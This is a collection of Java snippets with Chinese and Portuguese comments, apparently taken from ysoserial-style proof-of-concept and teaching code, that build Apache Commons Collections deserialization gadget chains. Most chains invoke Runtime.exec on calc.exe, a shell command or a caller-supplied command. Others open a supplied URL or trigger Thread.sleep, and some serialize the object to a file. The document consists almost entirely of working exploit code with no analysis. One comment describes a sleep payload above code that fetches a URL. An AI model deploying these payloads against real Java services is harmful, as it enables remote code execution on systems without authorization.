public static Object Reverse_Payload() throws Exception { Transformer[] transformers = new Transformer[]{ new ConstantTransformer(Runtime.class), new InvokerTransformer("getMethod", new Class[]{String.class, Class[].class}, new Object[]{"getRuntime", new Class[0]}), new InvokerTransformer("invoke", new Class[]{Object.class, Object[].class}, new Object[]{null, new Object[0]}), new InvokerTransformer("exec", new Class[]{String.class}, new Object[]{"calc.exe"})}; Transformer transformerChain = new ChainedTransformer(transformers); Map pocMap = new HashMap(); pocMap.put("value", "value"); Map outmap = TransformedMap.decorate(pocMap, null, transformerChain); //通过反射获得AnnotationInvocationHandler类对象 Class cls = Class.forName("sun.reflect.annotation.AnnotationInvocationHandler"); //通过反射获得cls的构造函数 Constructor ctor = cls.getDeclaredConstructor(Class.class, Map.class); //这里需要设置Accessible为true,否则序列化失败 ctor.setAccessible(true); //通过newInstance()方法实例化对象 Object instance = ctor.newInstance(Retention.class, outmap); return instance; }
public BadAttributeValueExpException getObject(final String command) throws Exception { final String[] execArgs = new String[] { command }; // inert chain for setup final Transformer transformerChain = new ChainedTransformer( new Transformer[]{ new ConstantTransformer(1) }); // real chain for after setup final Transformer[] transformers = new Transformer[] { new ConstantTransformer(Runtime.class), new InvokerTransformer("getMethod", new Class[] { String.class, Class[].class }, new Object[] { "getRuntime", new Class[0] }), new InvokerTransformer("invoke", new Class[] { Object.class, Object[].class }, new Object[] { null, new Object[0] }), new InvokerTransformer("exec", new Class[] { String.class }, execArgs), new ConstantTransformer(1) }; final Map innerMap = new HashMap(); final Map lazyMap = LazyMap.decorate(innerMap, transformerChain); TiedMapEntry entry = new TiedMapEntry(lazyMap, "foo"); BadAttributeValueExpException val = new BadAttributeValueExpException(null); Field valfield = val.getClass().getDeclaredField("val"); valfield.setAccessible(true); valfield.set(val, entry); Reflections.setFieldValue(transformerChain, "iTransformers", transformers); // arm with actual transformer chain return val; }
public InvocationHandler getObject(final String command) throws Exception { final String[] execArgs = new String[] { command }; // inert chain for setup final Transformer transformerChain = new ChainedTransformer( new Transformer[]{ new ConstantTransformer(1) }); // real chain for after setup final Transformer[] transformers = new Transformer[] { new ConstantTransformer(Runtime.class), new InvokerTransformer("getMethod", new Class[] { String.class, Class[].class }, new Object[] { "getRuntime", new Class[0] }), new InvokerTransformer("invoke", new Class[] { Object.class, Object[].class }, new Object[] { null, new Object[0] }), new InvokerTransformer("exec", new Class[] { String.class }, execArgs), new ConstantTransformer(1) }; final Map innerMap = new HashMap(); final Map lazyMap = LazyMap.decorate(innerMap, transformerChain); final Map mapProxy = Gadgets.createMemoitizedProxy(lazyMap, Map.class); final InvocationHandler handler = Gadgets.createMemoizedInvocationHandler(mapProxy); Reflections.setFieldValue(transformerChain, "iTransformers", transformers); // arm with actual transformer chain return handler; }
@SuppressWarnings ( {"unchecked"} ) public static void main(String[] args) throws ClassNotFoundException, NoSuchMethodException, InstantiationException, IllegalAccessException, IllegalArgumentException, InvocationTargetException { String cmd[] = {"/bin/sh", "-c", "touch /tmp/h2hc_lazymap"}; // Comando a ser executado Transformer[] transformers = new Transformer[] { // retorna Class Runtime.class new ConstantTransformer(Runtime.class), // 1o. Objeto InvokerTransformer: .getMethod("getRuntime", new Class[0]) new InvokerTransformer( "getMethod", // invoca método getMethod ( new Class[] {String.class, Class[].class } ),// tipos dos parâmetros: (String, Class[]) ( new Object[] {"getRuntime", new Class[0] } ) // parâmetros: (getRuntime, Class[0]) ), // 2o. Objeto InvokerTransformer: .invoke(null, new Object[0]) new InvokerTransformer( "invoke", // invoca método: invoke (new Class[] {Object.class, Object[].class }),// tipos dos parâmetros: (Object.class, Object[]) (new Object[] {null, new Object[0] }) // parâmetros: (null, new Object[0]) ), // 3o. Objeto InvokerTransformer: .exec(cmd[]) new InvokerTransformer( "exec", // invoca método: exec new Class[] { String[].class }, // tipos dos parâmetros: (String[]) new Object[]{ cmd } ) // parâmetros: (cmd[]) }; // Cria o objeto ChainedTransformer com o array de Transformers: Transformer transformerChain = new ChainedTransformer(transformers); // Cria o map Map map = new HashMap(); // Decora o map com o LazyMap e a cadeia de transformações como factory Map lazyMap = LazyMap.decorate(map,transformerChain); lazyMap.get("h2hc2"); // Tenta recuperar uma chave inexistente (BUM) }
public BadAttributeValueExpException getObject(CmdExecuteHelper cmdHelper) throws Exception { final String[] execArgs = cmdHelper.getCommandArray(); // inert chain for setup final Transformer transformerChain = new ChainedTransformer( new Transformer[]{ new ConstantTransformer(1) }); // real chain for after setup final Transformer[] transformers = new Transformer[] { new ConstantTransformer(Runtime.class), new InvokerTransformer("getMethod", new Class[] { String.class, Class[].class }, new Object[] { "getRuntime", new Class[0] }), new InvokerTransformer("invoke", new Class[] { Object.class, Object[].class }, new Object[] { null, new Object[0] }), new InvokerTransformer("exec", new Class[] { String[].class }, new Object[]{execArgs}), new ConstantTransformer(1) }; final Map innerMap = new HashMap(); final Map lazyMap = LazyMap.decorate(innerMap, transformerChain); TiedMapEntry entry = new TiedMapEntry(lazyMap, "foo"); BadAttributeValueExpException val = new BadAttributeValueExpException(null); Field valfield = val.getClass().getDeclaredField("val"); valfield.setAccessible(true); valfield.set(val, entry); Reflections.setFieldValue(transformerChain, "iTransformers", transformers); // arm with actual transformer chain return val; }
public InvocationHandler getObject(CmdExecuteHelper cmdHelper) throws Exception { final String[] execArgs = cmdHelper.getCommandArray(); // inert chain for setup final Transformer transformerChain = new ChainedTransformer( new Transformer[]{ new ConstantTransformer(1) }); // real chain for after setup final Transformer[] transformers = new Transformer[] { new ConstantTransformer(Runtime.class), new InvokerTransformer("getMethod", new Class[] { String.class, Class[].class }, new Object[] { "getRuntime", new Class[0] }), new InvokerTransformer("invoke", new Class[] { Object.class, Object[].class }, new Object[] { null, new Object[0] }), new InvokerTransformer("exec", new Class[] { String[].class }, new Object[]{execArgs}), new ConstantTransformer(1) }; final Map innerMap = new HashMap(); final Map lazyMap = LazyMap.decorate(innerMap, transformerChain); final Map mapProxy = Gadgets.createMemoitizedProxy(lazyMap, Map.class); final InvocationHandler handler = Gadgets.createMemoizedInvocationHandler(mapProxy); Reflections.setFieldValue(transformerChain, "iTransformers", transformers); // arm with actual transformer chain return handler; }
@SuppressWarnings ( {"unchecked"} ) public static void main(String[] args) throws ClassNotFoundException, NoSuchMethodException, InstantiationException, IllegalAccessException, IllegalArgumentException, InvocationTargetException, IOException { String url = args[0]; // Cria array de transformers que resulta na seguinte construção: // new URL(url).openConnection().getInputStream().read(); Transformer[] transformers = new Transformer[] { new ConstantTransformer(new URL(url)), new InvokerTransformer("openConnection", new Class[] { }, new Object[] {}), new InvokerTransformer("getInputStream", new Class[] { }, new Object[] {}), new InvokerTransformer("read", new Class[] {}, new Object[] {}) }; // Cria o objeto ChainedTransformer com o array de Transformers: Transformer transformerChain = new ChainedTransformer(transformers); // Cria o map Map map = new HashMap(); // Decora o map com o LazyMap e a cadeia de transformações como factory Map lazyMap = LazyMap.decorate(map,transformerChain); // Usa reflexão para obter referencia da classe AnnotationInvocationHandler Class cl = Class.forName("sun.reflect.annotation.AnnotationInvocationHandler"); // Obtem construtor da AnnotationInvocationHandler que recebe um tipo (class) e um Map Constructor ctor = cl.getDeclaredConstructor(Class.class, Map.class); // Torna o construtor acessível ctor.setAccessible(true); // Obtem/Cria instancia do AnnotationInvocationHandler, fornecendo (via construtor) um Retetion.class (que eh um // type Annotation, requerido pelo construtor) e atribui o LazyMap (contendo a cadeia de Transformers) ao campo // memberValues. Assim, ao tentar obter uma chave inexiste deste campo, a cadeia será "executada"! InvocationHandler handlerLazyMap = (InvocationHandler) ctor.newInstance(Retention.class, lazyMap); //criado a interface map Class[] interfaces = new Class[] {java.util.Map.class}; // cria o Proxy "entre" a interface Map e o AnnotationInvocationHandler anterior (que contém o lazymap+transformers) Map proxyMap = (Map) Proxy.newProxyInstance(null, interfaces, handlerLazyMap); // cria outro AnnotationInvocationHandler atribui o Proxy ao campo memberValues // esse Proxy será "acionado" no magic method readObject e, assim, desviará o fluxo para o // método invoke() do primeiro AnnotationInvocationHandler criado (que contém o LazyMap+Transformers) InvocationHandler handlerProxy = (InvocationHandler) ctor.newInstance(Retention.class, proxyMap); // Serializa o objeto "handlerProxy" e o salva em arquivo. Ao ser desserializado, // o readObject irá executar um map.entrySet() e, assim, desviar o fluxo para o invoke(). // No invoke(), uma chave inexistente será buscada no campo "memberValues" (que contém um LazyMap // com a cadeia de Transformers), o que deverá acionar o Thread.sleep(10000)! System.out.println("Saving serialized object in SleepExample.ser"); FileOutputStream fos = new FileOutputStream("SleepExample.ser"); ObjectOutputStream oos = new ObjectOutputStream(fos); oos.writeObject(handlerProxy); oos.flush(); }
@SuppressWarnings ( {"unchecked"} ) public static void main(String[] args) throws ClassNotFoundException, NoSuchMethodException, InstantiationException, IllegalAccessException, IllegalArgumentException, InvocationTargetException, IOException { // Cria array de Transformers que irá resultar na seguinte construção: //Thread.class.getMethod("sleep", new Class[]{Long.TYPE}).invoke(null, new Object[]{10000L}); Transformer[] transformers = new Transformer[] { new ConstantTransformer(Thread.class), // retorna class Thread.class // 1o. Objeto InvokerTransformer: getMethod("sleep", new Class[]{Long.TYPE}) new InvokerTransformer( "getMethod", // invoca método getMethod ( new Class[] {String.class, Class[].class } ), // tipos dos parâmetros: (String, Class[]) ( new Object[] {"sleep", new Class[]{Long.TYPE} } ) // parâmetros: (sleep, new Class[]{Long.TYPE}) ), // 2o. Objeto InvokerTransformer: invoke(null, new Object[]{10000L}) new InvokerTransformer( "invoke", // invoca método: invoke (new Class[] {Object.class, Object[].class }),// tipos dos parâmetros: (Object.class, Object[]) (new Object[] {null, new Object[] {10000L} }) // parâmetros: (null, new Object[] {10000L}) ) }; // Cria o objeto ChainedTransformer com o array de Transformers: Transformer transformerChain = new ChainedTransformer(transformers); // Cria o map Map map = new HashMap(); // Decora o map com o LazyMap e a cadeia de transformações como factory Map lazyMap = LazyMap.decorate(map,transformerChain); // Usa reflexão para obter referencia da classe AnnotationInvocationHandler Class cl = Class.forName("sun.reflect.annotation.AnnotationInvocationHandler"); // Obtem construtor da AnnotationInvocationHandler que recebe um tipo (class) e um Map Constructor ctor = cl.getDeclaredConstructor(Class.class, Map.class); // Torna o construtor acessível ctor.setAccessible(true); // Obtem/Cria instancia do AnnotationInvocationHandler, fornecendo (via construtor) um Retetion.class (que eh um // type Annotation, requerido pelo construtor) e atribui o LazyMap (contendo a cadeia de Transformers) ao campo // memberValues. Assim, ao tentar obter uma chave inexiste deste campo, a cadeia será "executada"! InvocationHandler handlerLazyMap = (InvocationHandler) ctor.newInstance(Retention.class, lazyMap); //cria a interface map Class[] interfaces = new Class[] {java.util.Map.class}; // cria o Proxy "entre" a interface Map e o AnnotationInvocationHandler anterior (que contém o lazymap+transformers) Map proxyMap = (Map) Proxy.newProxyInstance(null, interfaces, handlerLazyMap); // cria outro AnnotationInvocationHandler atribui o Proxy ao campo memberValues // esse Proxy será "acionado" no magic method readObject e, assim, desviará o fluxo para o // método invoke() do primeiro AnnotationInvocationHandler criado (que contém o LazyMap+Transformers) InvocationHandler handlerProxy = (InvocationHandler) ctor.newInstance(Retention.class, proxyMap); // Serializa o objeto "handlerProxy" e o salva em arquivo. Ao ser desserializado, // o readObject irá executar um map.entrySet() e, assim, desviar o fluxo para o invoke(). // No invoke(), uma chave inexistente será buscada no campo "memberValues" (que contém um LazyMap // com a cadeia de Transformers), o que deverá acionar o Thread.sleep(10000)! System.out.println("Saving serialized object in SleepExample.ser"); FileOutputStream fos = new FileOutputStream("SleepExample.ser"); ObjectOutputStream oos = new ObjectOutputStream(fos); oos.writeObject(handlerProxy); oos.flush(); }
